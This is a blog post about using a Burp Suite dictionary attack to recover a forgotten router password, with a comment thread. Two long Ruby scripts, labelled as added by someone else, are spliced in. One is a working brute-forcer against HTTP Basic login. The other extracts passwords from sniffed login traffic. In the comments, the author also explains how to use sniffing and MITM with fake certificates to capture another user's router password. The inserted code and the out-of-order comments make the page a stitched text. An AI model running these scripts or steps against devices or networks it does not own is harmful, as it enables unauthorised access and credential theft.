Recovering router password using Burp Suite dictionary attack

August 26th, 2013. Posted at: Backtrack, Blackbuntu, Kali, Linux, Windows

A few weeks ago, while cleaning up, I found an old access point/router. I wanted to attach it to my network and run some tests, but I did not remember the password for its web configuration page. I knew it had to be some default user/password combination, but none of my guesses worked. It seemed the right time to set up a small dictionary attack. There are many powerful tools for this task, but I used Burp Suite because I love it and use it whenever I can. Furthermore, it is a perfect tool for understanding what happens behind the scenes during this kind of attack.

I made the following video to explain the process. I hope you find it helpful.

If you want, you can download the ‘combinator’ script used in the video: combinator.rb.

Enjoy.
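Worked example, added here and not code from the original post or from its combinator.rb (whose source is not on the page): a Ruby script that does by hand what the video does with Burp Intruder against a router that uses HTTP Basic authentication. It builds every user:pass pair from two wordlists, Base64-encodes each pair as the Authorization header payload Intruder would substitute, and grades each response by status code and body length against a known-bad guess, which is the same thing you do by sorting Intruder's Length column. The wordlists, the target URL, the helper names and the assumption that combinator.rb produces the Cartesian product of two lists are all mine, not the page's.

```ruby
require 'base64'
require 'net/http'
require 'uri'

# Constructed sample lists standing in for the user and password lists used
# in the video; the page does not publish the real ones.
USERS     = %w[admin root user].freeze
PASSWORDS = ['admin', 'password', '1234', ''].freeze

# Cartesian product of both lists as "user:pass" strings. This is what the
# video's combinator.rb is assumed to do (its source is not on the page).
def combinations(users, passwords)
  users.product(passwords).map { |user, pass| "#{user}:#{pass}" }
end

# HTTP Basic auth sends the pair Base64-encoded, not encrypted. This is the
# payload Intruder substitutes into the Authorization header.
def basic_auth_value(pair)
  Base64.strict_encode64(pair)
end

# Grade one attempt. A 401 is a clean rejection; routers that answer 200
# with an error page are caught by comparing the body length with that of a
# known wrong guess.
def classify(status, body_length, rejected_length)
  return :rejected if status == 401 || body_length == rejected_length
  :candidate
end

# Run the attack against a live target. Only executed when a URL is given on
# the command line, so the file loads without touching the network.
def try_all(target, users, passwords)
  uri  = URI(target)
  path = uri.path.empty? ? '/' : uri.path
  http = Net::HTTP.new(uri.host, uri.port)
  http.open_timeout = http.read_timeout = 5
  # A deliberately bad guess shows what a rejection looks like on this router.
  bad = http.get(path, 'Authorization' => "Basic #{basic_auth_value('nosuchuser:nosuchpass')}")
  rejected_length = bad.body.to_s.bytesize
  combinations(users, passwords).each do |pair|
    res = http.get(path, 'Authorization' => "Basic #{basic_auth_value(pair)}")
    verdict = classify(res.code.to_i, res.body.to_s.bytesize, rejected_length)
    puts format('%-24s %s %6d %s', pair, res.code, res.body.to_s.bytesize, verdict)
    return pair if verdict == :candidate
  end
  nil
end

if __FILE__ == $PROGRAM_NAME && ARGV.length == 1
  hit = try_all(ARGV[0], USERS, PASSWORDS)
  puts(hit ? "Possible credentials: #{hit}" : 'No hit; extend the lists')
end
```

Usage: `ruby basic_dict.rb http://192.168.1.1/` (hypothetical address). For a form-based login like the one at the end of the video, the same classify step applies, but the payload goes into the POST body fields instead of the Authorization header and the known-bad reference is a 200 response carrying the login page again.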


7 Responses to “Recovering router password using Burp Suite dictionary attack”

  1. Kirill says:

    Re-upload combinator.rb or give another link.
    Thank you

  2. Ryan says:

    Is there a way to recover a router password on a router that isn’t using HTTP basic authentication (popup on the router page)?

    • Samuel says:

      Hello Ryan,

      You first have to study the way credentials are provided to the router and then configure the attack accordingly. In the final part of the video (min 06:43) I show how to use this technique against a router that does not receive credentials via HTTP basic authentication.

  3. Samuel says:

    Hi Modar,

    You are right. The key here is that the communication between the user and the router is not encrypted. We are not using HTTPS to access the router’s home page. This means that if you can sniff the HTTP POST request that contains the login info, you can get the password. The challenge is how to get this request.

    For example, if you are inside a non-switched network, all the traffic is sent to all the stations and you only have to put your network interface in promiscuous mode to get it.
    If the user that logs into the router is using a wireless connection, you can “sniff the air” and get the traffic you need.
    Finally, if you are inside a wired switched network you will have to apply a MITM (Man In The Middle) technique to get the traffic. You can use this technique even if the connection was encrypted, by using a fake certificate.

    Once you can sniff the traffic (with your card in promiscuous mode) you can use a tool like Wireshark to view the individual packets, find the HTTP POST request and get the password.

    But none of this would have worked for me because nobody knew the password. So my options were a dictionary attack or finding some vulnerability to exploit for that router model.

    Thank you for your comment.
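As an added example illustrating the reply above (not part of the original thread, and not the author's code), here is a Ruby function that pulls credentials out of a captured plain-HTTP request of the kind Wireshark's “Follow TCP Stream” shows: either an Authorization: Basic header, which is only Base64 and hides nothing, or a URL-encoded POST form. The two captured requests, the host address and the field names are constructed samples, not traffic from the page.

```ruby
require 'base64'
require 'uri'

# Constructed samples (not from the original page) of what Wireshark's
# "Follow TCP Stream" shows for two plain-HTTP router logins.
SAMPLE_FORM_POST = [
  'POST /login.cgi HTTP/1.1',
  'Host: 192.168.1.1',
  'Content-Type: application/x-www-form-urlencoded',
  'Content-Length: 35',
  '',
  'username=admin&password=s3cr%24t%21'
].join("\r\n").freeze

SAMPLE_BASIC_GET = [
  'GET /index.html HTTP/1.1',
  'Host: 192.168.1.1',
  'Authorization: Basic YWRtaW46YWRtaW4=',
  '',
  ''
].join("\r\n").freeze

# Field names that usually carry the password in router login forms (assumption).
PASSWORD_FIELDS = /pass|pwd|secret/i

# Split one raw HTTP request into request line, lower-cased header hash and body.
def parse_request(raw)
  head, body = raw.split("\r\n\r\n", 2)
  lines = head.to_s.split("\r\n")
  request_line = lines.shift
  headers = lines.each_with_object({}) do |line, h|
    name, value = line.split(':', 2)
    h[name.strip.downcase] = value.to_s.strip
  end
  { request_line: request_line, headers: headers, body: body.to_s }
end

# Return whatever credentials the request carries. Basic auth is only
# Base64 (no secrecy at all); a form POST is URL-encoded clear text.
def extract_credentials(raw)
  req = parse_request(raw)
  found = {}

  auth = req[:headers]['authorization']
  if auth && (m = auth.match(/\ABasic\s+(\S+)\z/i))
    begin
      user, pass = Base64.strict_decode64(m[1]).split(':', 2)
      found[:basic] = { user: user, password: pass }
    rescue ArgumentError
      # Malformed Base64: not a usable header, skip it.
    end
  end

  ctype = req[:headers]['content-type'].to_s
  if ctype.start_with?('application/x-www-form-urlencoded')
    fields = URI.decode_www_form(req[:body]).to_h
    found[:form] = fields if fields.keys.any? { |k| k =~ PASSWORD_FIELDS }
  end

  found
end

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_FORM_POST, SAMPLE_BASIC_GET].each do |raw|
    puts "#{raw.lines.first.chomp} -> #{extract_credentials(raw).inspect}"
  end
end
```

The same parsing works on a request pasted from Wireshark's stream view or on one saved by Burp's proxy history; the only difference between the two login styles is where the cleartext sits, and neither survives an HTTPS-only configuration with a valid certificate.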

  4. Modar says:

    Great video! I was really looking for this.

    Quick question, though: what if I’m not using a common combination for my router home page? What if I’m using numbers and symbols? Is there any way to capture the username/password combination when another user logs into the router’s home page, since the encoding is pretty basic, or sometimes even plain text? In other words, if I’m connected to the network through the wireless password but have no access to the router’s home page, can I sniff the combination when another user enters it, or is the dictionary attack the only way possible?

    Thanks.
